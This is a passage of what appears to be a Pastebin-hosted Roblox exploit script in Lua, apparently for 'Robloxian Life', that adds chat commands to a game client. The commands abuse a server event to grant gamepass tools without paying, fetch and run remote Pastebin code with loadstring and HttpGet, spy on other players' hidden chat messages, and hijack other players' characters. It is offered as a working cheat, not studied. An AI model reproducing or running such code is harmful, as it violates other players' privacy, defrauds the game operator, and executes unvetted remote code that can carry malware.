  604. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  605. end
  606. if msg:lower() == ".noob" then
  607. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  608. wait()
  609. loadstring(game:HttpGet("https://pastebin.com/raw/aUnrfhmy"))()
  610. end
  611. if msg:lower() == ".spy" then
  612. --This script reveals ALL hidden messages in the default chat
  613. --chat "/spy" to toggle!
  614. enabled = true
  615. --if true will check your messages too
  616. spyOnMyself = true
  617. --if true will chat the logs publicly (fun, risky)
  618. public = false
  619. --if true will use /me to stand out
  620. publicItalics = true
  621. --customize private logs
  622. privateProperties = {
  623. Color = Color3.fromRGB(0,255,255);
  624. Font = Enum.Font.SourceSansBold;
  625. TextSize = 18;
  626. }
  627. --////////////////////////////////////////////////////////////////
  628. local StarterGui = game:GetService("StarterGui")
  629. local Players = game:GetService("Players")
  630. local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer
  631. local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
  632. local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
  633. local instance = (_G.chatSpyInstance or 0) + 1
  634. _G.chatSpyInstance = instance
  635.  
  636. local function onChatted(p,msg)
  637. if _G.chatSpyInstance == instance then
  638. if p==player and msg:lower():sub(1,4)=="/spy" then
  639. enabled = not enabled
  640. wait(0.3)
  641. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  642. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  643. elseif enabled and (spyOnMyself==true or p~=player) then
  644. msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
  645. local hidden = true
  646. local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
  647. if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then
  648. hidden = false
  649. end
  650. end)
  651. wait(1)
  652. conn:Disconnect()
  653. if hidden and enabled then
  654. if public then
  655. saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
  656. else
  657. privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
  658. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  659. end
  660. end
  661. end
  662. end
  663. end
  664.  
  665. for _,p in ipairs(Players:GetPlayers()) do
  666. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  667. end
  668. Players.PlayerAdded:Connect(function(p)
  669. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  670. end)
  671. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  672. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  673. if not player.PlayerGui:FindFirstChild("Chat") then wait(3) end
  674. local chatFrame = player.PlayerGui.Chat.Frame
  675. chatFrame.ChatChannelParentFrame.Visible = true
  676. chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
  677. end
  678. if msg:lower() == ".machinegun" then
  679. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  680. wait()
  681. loadstring(game:HttpGet("https://pastebin.com/raw/GgGWi3yp"))()
  682. end
  683. if string.sub(msg,1,6) == (".body")then
  684. while true do
  685. for i = 0,1,0.1 do
  686. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new(Color3.fromHSV(i,1,1)))
  687. wait(.1)
  688. end
  689. end
  690. end
  691. if string.sub(msg,1,2) == ("re")then
  692. game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(15)
  693. end
  694. if string.sub(msg,1,3) == (".rj")then
  695. game:GetService("TeleportService"):Teleport(game.PlaceId,
  696. game:GetService("Players").LocalPlayer)
  697. end
  698. local gamepassId = IDFORSPAWNER
  699.  
  700. local RobloxianLife = loadstring(game:HttpGetAsync("https://pastebin.com/raw/HTF0vRHF"))()
  701. local CommandApi = loadstring(game:HttpGetAsync("https://pastebin.com/raw/3mHL7pKv"))()
  702. local players = game:GetService("Players")
  703. local localPlayer = players.localPlayer
  704.  
  705. RobloxianLife:Initialize(gamepassId)
  706.  
  707. local function strStarts(String,Start)
  708. return string.sub(String,1,string.len(Start))==Start
  709. end
  710.  
  711. local function getPlayerByName(name)
  712. local plrs = {}
  713.  
  714. if name == "me" then
  715. table.insert(plrs, localPlayer)
  716. return plrs
  717. elseif name == "others" then
  718. for i,v in pairs(players:GetPlayers()) do
  719. if v.Name ~= localPlayer.Name then
  720. table.insert(plrs, v)
  721. end
  722. end
  723. return plrs
  724. elseif name == "all" then
  725. for i,v in pairs(players:GetPlayers()) do
  726. table.insert(plrs, v)
  727. end
  728. return plrs
  729. elseif name == "random" then
  730. table.insert(plrs, players:GetPlayers()[math.random(1, #players:GetPlayers())])
  731. return plrs
  732. end
  733.  
  734. for i,v in pairs(players:GetPlayers()) do
  735. if strStarts(v.Name, name) then
  736. table.insert(plrs, v)
  737. end
  738. end
  739. return plrs
  740. end
  741.  
  742. CommandApi:AddCommand(".control", function(name)
  743. for i,v in pairs(getPlayerByName(name)) do
  744. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid, "HipHeight", 0.1)
  745. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid.RootPart.RootJoint, "Part1", v.Character:FindFirstChild'Torso' and v.Character.Torso or v.Character.LowerTorso)
  746. end
  747. end)
  748.  
  749. CommandApi:AddCommand(".size", function(mult)
  750. mult = tonumber(mult)
  751. if not mult then return end
  752.  
  753. local function multiplycf(cf, m)
  754. return CFrame.new(cf.p*m)*CFrame.fromOrientation(cf:ToOrientation())
  755. end
  756.  
  757. for i,v in pairs(localPlayer.Character:GetDescendants()) do
  758. if v:isA"BasePart" then
  759. RobloxianLife:SetLocalProperty(v,"Size", v.Size*mult)
  760. elseif v:isA"Motor6D" then
  761. RobloxianLife:SetLocalProperty(v,"C0", multiplycf(v.C0, mult))
  762. RobloxianLife:SetLocalProperty(v,"C1", multiplycf(v.C1, mult))
  763. end
  764. end
  765. end)
  766.  
  767. local chatConnection = localPlayer.Chatted:Connect(CommandApi.OnChatted)
  768.  
  769. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement